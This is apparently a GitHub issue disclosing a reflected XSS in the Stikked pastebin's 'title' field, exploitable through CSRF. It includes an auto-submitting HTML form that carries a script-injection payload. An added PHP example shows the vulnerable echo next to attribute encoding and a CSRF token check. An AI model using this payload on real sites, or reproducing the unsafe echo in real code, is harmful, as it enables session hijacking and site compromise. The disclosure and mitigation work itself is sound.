Open omriman067 opened 2 years ago
When an unsuccessful paste is submitted, the "title" parameter is returned without sanitization, which can lead to an XSS. This could be exploited using CSRF. Here is an example of such a CSRF payload:
```html
<html>
  <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
    <form id="myForm" name="myForm" action="https://stikked-site-to-xss/" method="POST">
      <input type=hidden name="title" id="val1" value='"/><script>alert(document.domain)</script>'/>
      <input type=hidden name="lang" id="val2" value="value2"/>
      <input type=hidden name="code" id="val3" value="value3"/>
      <input type=hidden name="submit" id="submit" value="Continue"/>
    </form>
  </body>
</html>
```
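The two mitigations this report points to, HTML-attribute encoding of the echoed title and a CSRF token on the paste form, shown as an added example that is not part of the original issue and is not Stikked's code. The function names, the `csrf` field and the session array are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not taken from the Stikked code base.

// The pattern the report describes: the submitted title is echoed back
// into the value attribute as-is when the paste is rejected.
function render_title_field_unsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '" />';
}

// Hardened form: encode for an HTML attribute context, covering both
// quote styles so the value cannot close the attribute or the tag.
function render_title_field(string $title): string
{
    $safe = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $safe . '" />';
}

// Per-session CSRF token, embedded as a hidden field in the paste form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// A cross-site form cannot read the token, so its POST fails this check.
function csrf_valid(array $session, array $post): bool
{
    return isset($session['csrf'], $post['csrf'])
        && is_string($post['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
}

// Constructed input: the field values from the report, with no token,
// as the auto-submitting form would send them.
$session = [];
csrf_token($session);
$post = [
    'title' => '"/><script>alert(document.domain)</script>',
    'lang'  => 'value2',
    'code'  => 'value3',
];

if (!csrf_valid($session, $post)) {
    echo "rejected: missing or invalid CSRF token\n";
}
// Even if the request reached the error page, the echoed title is inert text.
echo render_title_field($post['title']), "\n";
```

The encoding fixes the XSS itself; the token check only removes the cross-site delivery path, so both are needed.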